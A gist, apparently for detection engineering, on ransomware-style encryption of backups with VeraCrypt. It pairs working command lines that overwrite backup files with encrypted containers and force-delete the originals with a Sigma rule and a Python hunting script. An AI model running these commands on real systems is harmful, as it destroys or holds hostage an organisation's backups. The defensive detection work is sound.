@justaguywhocodes
Created November 21, 2025 14:10
## Commands commonly observed in the wild for this TTP (for testing/detection purposes only)

Below are typical commands adversaries use with VeraCrypt to encrypt on-premises backups. They are provided strictly for blue-team detection rule creation, lab testing, or red-team emulation in authorized environments. Two things to keep straight when reading or emulating them: volumes are created by `VeraCrypt Format.exe` (`/create`, `/size`, `/encryption`, `/filesystem` are its switches) and mounted or dismounted by `VeraCrypt.exe` (`/volume`, `/letter`, `/dismount`); and the short switch forms are not what their letters suggest: `/e` is `/explore`, `/h` is `/history`, `/c` is `/cache` on VeraCrypt.exe and `/create` on VeraCrypt Format.exe, while `/hash` and `/encryption` have no short form. The paths below assume the portable package was unpacked to C:\Temp.

### 1. Download VeraCrypt (portable version preferred by attackers)

```powershell
# The portable build is a self-extracting archive; running it unpacks VeraCrypt.exe,
# VeraCrypt-x64.exe and "VeraCrypt Format.exe" into a folder of the user's choosing.
Invoke-WebRequest -Uri "https://launchpad.net/veracrypt/trunk/1.26.7/+download/VeraCrypt_Portable_1.26.7.exe" -OutFile "C:\Temp\VeraCrypt.exe"
```
### 2. Overwrite an existing backup file with a VeraCrypt container at the same path (most common method)

VeraCrypt cannot encrypt a file in place. `/create` writes a fresh container to the path it is given and `/force` suppresses the overwrite prompt, so the backup is destroyed and replaced by a container that carries the backup's name and extension. The size has to be stated explicitly as a number with a K/M/G/T suffix; `/size`, `/filesystem` and `/encryption` belong to VeraCrypt Format.exe, not to the mount command.

```cmd
"VeraCrypt Format.exe" /create "E:\Backups\backup.vhdx" /size 50G /password SuperSecret123! /hash sha512 /encryption AES /filesystem NTFS /force /silent
```

The container is then mounted silently (the variant circulating with this gist passed `/e aes /h sha512`, which VeraCrypt reads as `/explore` and `/history`; the PRF is selected with the full `/hash` switch, and the cipher is read from the volume header):

```cmd
VeraCrypt.exe /v "E:\Backups\backup.vhdx" /l X /p SuperSecret123! /hash sha512 /q /s
```
### 3. Replace and mount all backup files in a batch

Each file is overwritten with a container and mounted in turn (paths assume the portable build unpacked to C:\Temp). Mounting an untouched .vhdx as a VeraCrypt volume simply fails, so the creation step is what makes the loop work. The original loop took the drive letter from the first character of the file name (collisions and non-letters break the mount) and passed `/e aes-twofish-serpent`, which is `/explore` followed by a value VeraCrypt does not recognise; the cascade is named `AES(Twofish(Serpent))` and is a creation-time option.

```powershell
$i = 0
Get-ChildItem "E:\Backups\*.vhdx", "E:\Backups\*.vmdk" | ForEach-Object {
    # Drive letters come from a counter (X, W, V, ...) rather than from the file name.
    & "C:\Temp\VeraCrypt Format.exe" /create $_.FullName /size 50G /password "P@ssw0rd2025!" /hash sha512 /encryption "AES(Twofish(Serpent))" /filesystem NTFS /force /silent
    & "C:\Temp\VeraCrypt.exe" /v $_.FullName /l ([char](88 - $i++)) /p "P@ssw0rd2025!" /q /s
}
```
### 4. Create a new large VeraCrypt container and copy the backup data into it (then delete the originals)

The size suffix is a single letter (`500G`, not `500GB`). Because the container sits inside the backup folder, the copy has to exclude it and the cleanup has to delete only the backup files: the `rmdir /S /Q E:\Backups` in the circulating variant would have wiped the freshly created container together with the originals, and a plain `xcopy E:\Backups\*` would try to copy the container into itself. robocopy with `/XF` is used here for that reason.

```cmd
"VeraCrypt Format.exe" /create E:\Backups\encrypted_backups.hc /size 500G /password Malicious123! /hash whirlpool /encryption AES /filesystem NTFS /force /silent
VeraCrypt.exe /volume E:\Backups\encrypted_backups.hc /letter Z /password Malicious123! /quit /silent
robocopy E:\Backups Z:\ /E /XF *.hc
VeraCrypt.exe /dismount Z /force /quit
del /F /Q E:\Backups\*.vhdx E:\Backups\*.vbk E:\Backups\*.vmdk E:\Backups\*.bak
```
### 5. Full-disk encryption of a backup drive (less common but seen)

There is no one-line equivalent for this variant. `VeraCrypt Format.exe /create` accepts only a file container path, so encrypting a whole physical drive or partition goes through the Volume Creation Wizard ("Encrypt a non-system partition/drive") interactively. The command that circulates with this gist (`/create \\.\PhysicalDrive2 ... /hash RIPEMD-160 /noise /fast`) does not run: `/noise` and `/fast` are not VeraCrypt switches, and RIPEMD-160 has not been offered for new volumes since VeraCrypt 1.26, so the 1.26.7 build fetched in step 1 would reject it. For emulation, drive the wizard by hand; for detection, the signal is `VeraCrypt Format.exe` starting without `/create` on a backup host, since the wizard is the only other reason that binary runs.
## Detection opportunities (what to hunt for)

### Process creation

- Parent process: cmd.exe / powershell.exe / wscript.exe
- Child process: VeraCrypt.exe, VeraCrypt-x64.exe, or VeraCrypt Format.exe (the creator; `/create` is the highest-signal switch because it overwrites whatever sits at its target path)
- Command line contains: /volume, /v, /create, backup file extensions (.vhdx, .vbk, .vmdk, .bak, etc.)
- Do not key rules on `/e aes` or `/h sha512`: those short forms mean `/explore` and `/history`, and `/hash` and `/encryption` have no short form, so such strings only match copy-pasted tooling, not VeraCrypt usage in general
Example Sigma rule snippet (the original fragment lacked the `logsource` and `condition` sections that Sigma requires, and matched only the mount binary):

```yaml
title: VeraCrypt Used Against Backup Files
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: ['\VeraCrypt.exe', '\VeraCrypt-x64.exe', '\VeraCrypt Format.exe']
  selection_cmd:
    CommandLine|contains: ['.vhdx', '.vbk', '.vmdk', '.bak', 'Backups']
  condition: all of selection_*
level: high
```
### File activity

- Large .hc files suddenly appearing on backup shares
- Original backup files disappearing after .hc creation
- The in-place variant (steps 2 and 3) keeps the backup's own name and extension, so the .hc heuristic misses it; there the signal is a backup file whose size jumps to a round container size and whose contents no longer carry the format's header (a VHDX, for example, starts with the ASCII signature `vhdxfile`; a VeraCrypt container is indistinguishable from random data)
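The two hunts above (a VeraCrypt binary launched against backup paths, and a large .hc appearing on a backup share shortly before the originals vanish) as runnable detection logic, added here as an example; it is not code from the original gist. It runs over constructed Sysmon-style events built into the script. The event shape, the `Size` field on the FileCreate event (Sysmon does not record one, so it is assumed to come from an enrichment step), the 1 GiB threshold and the 30-minute window are all assumptions made for this example.

```python
"""Hunting for VeraCrypt use against backup files.

Added example, not part of the original gist. Runs the page's two detection ideas
over constructed Sysmon-style events: (1) a VeraCrypt binary launched with a
command line naming backup files, mirroring the Sigma rule, and (2) a large .hc
container created on a backup path followed by backup files being deleted from
the same folder. Event fields, paths, the size threshold and the time window are
assumptions made for this example, not real telemetry."""
import re
from datetime import datetime, timedelta

BACKUP_EXTS = (".vhdx", ".vbk", ".vmdk", ".bak")
VERACRYPT_IMAGES = ("veracrypt.exe", "veracrypt-x64.exe", "veracrypt format.exe")
BACKUP_PATH_HINT = "backups"
LARGE_HC_BYTES = 1024 ** 3  # assumed threshold: ignore small personal containers


def flag_process(event):
    """Return a reason string when a Sysmon event 1 (process creation) shows a
    VeraCrypt binary touching backup data, else None."""
    if event.get("EventID") != 1:
        return None
    image = event["Image"].lower()
    if image.rsplit("\\", 1)[-1] not in VERACRYPT_IMAGES:
        return None
    cmd = event["CommandLine"].lower()
    if not (any(ext in cmd for ext in BACKUP_EXTS) or BACKUP_PATH_HINT in cmd):
        return None
    # /create overwrites its target, so rank it above a plain mount. The short
    # form /c means /create only on VeraCrypt Format.exe; on VeraCrypt.exe it is /cache.
    creating = "/create" in cmd or (
        image.endswith("veracrypt format.exe") and re.search(r"\s/c\s", cmd))
    verb = "create" if creating else "mount"
    return f"veracrypt {verb} touching backup data: {event['CommandLine']}"


def flag_hc_then_delete(events, window_minutes=30):
    """Correlate a large .hc created on a backup path (Sysmon event 11) with
    backup files deleted from the same folder (Sysmon events 23/26) within the
    window. `Size` is an assumed enrichment field; Sysmon's FileCreate has none."""
    window = timedelta(minutes=window_minutes)
    hits = []
    creates = [e for e in events if e.get("EventID") == 11
               and e["TargetFilename"].lower().endswith(".hc")
               and BACKUP_PATH_HINT in e["TargetFilename"].lower()
               and e.get("Size", 0) >= LARGE_HC_BYTES]
    for c in creates:
        folder = c["TargetFilename"].lower().rsplit("\\", 1)[0] + "\\"
        gone = [d["TargetFilename"] for d in events
                if d.get("EventID") in (23, 26)
                and d["TargetFilename"].lower().startswith(folder)
                and d["TargetFilename"].lower().endswith(BACKUP_EXTS)
                and timedelta(0) <= d["UtcTime"] - c["UtcTime"] <= window]
        if gone:
            hits.append((c["TargetFilename"], gone))
    return hits


T0 = datetime(2025, 11, 21, 14, 10)
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    {"EventID": 1, "UtcTime": T0, "Image": r"C:\Temp\VeraCrypt.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'VeraCrypt.exe /volume "E:\Backups\backup.vhdx" /letter X /password x /quit'},
    {"EventID": 1, "UtcTime": T0 + timedelta(minutes=2),
     "Image": r"C:\Temp\VeraCrypt Format.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"VeraCrypt Format.exe" /create E:\Backups\encrypted_backups.hc /size 500G /password x /silent'},
    {"EventID": 1, "UtcTime": T0, "Image": r"C:\Program Files\VeraCrypt\VeraCrypt.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # benign: a user's own container
     "CommandLine": r"VeraCrypt.exe /v D:\Private\notes.hc /l P /q"},
    {"EventID": 11, "UtcTime": T0 + timedelta(minutes=3),
     "TargetFilename": r"E:\Backups\encrypted_backups.hc", "Size": 500 * 1024 ** 3},
    {"EventID": 26, "UtcTime": T0 + timedelta(minutes=20),
     "TargetFilename": r"E:\Backups\backup.vhdx"},
    {"EventID": 26, "UtcTime": T0 + timedelta(minutes=21),
     "TargetFilename": r"E:\Backups\fileserver.vbk"},
]


def hunt(events=SAMPLE_EVENTS):
    """Run both detections; returns (process hits, list of (.hc, deleted backups))."""
    process_hits = [r for r in (flag_process(e) for e in events) if r]
    return process_hits, flag_hc_then_delete(events)


if __name__ == "__main__":
    process_hits, file_hits = hunt()
    for line in process_hits:
        print(line)
    for hc, gone in file_hits:
        print(f"{hc} created, then deleted: {', '.join(gone)}")
```

Pointing this at real telemetry means replacing SAMPLE_EVENTS with parsed Sysmon events 1, 11 and 23/26. The process check ranks `/create` above a mount on purpose: creating a container over a backup path is the step that destroys data, while a mount of a container a user legitimately owns is common noise.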
These commands are provided solely for authorized testing, detection engineering, and defensive research purposes. Do not execute them on production systems containing real backups.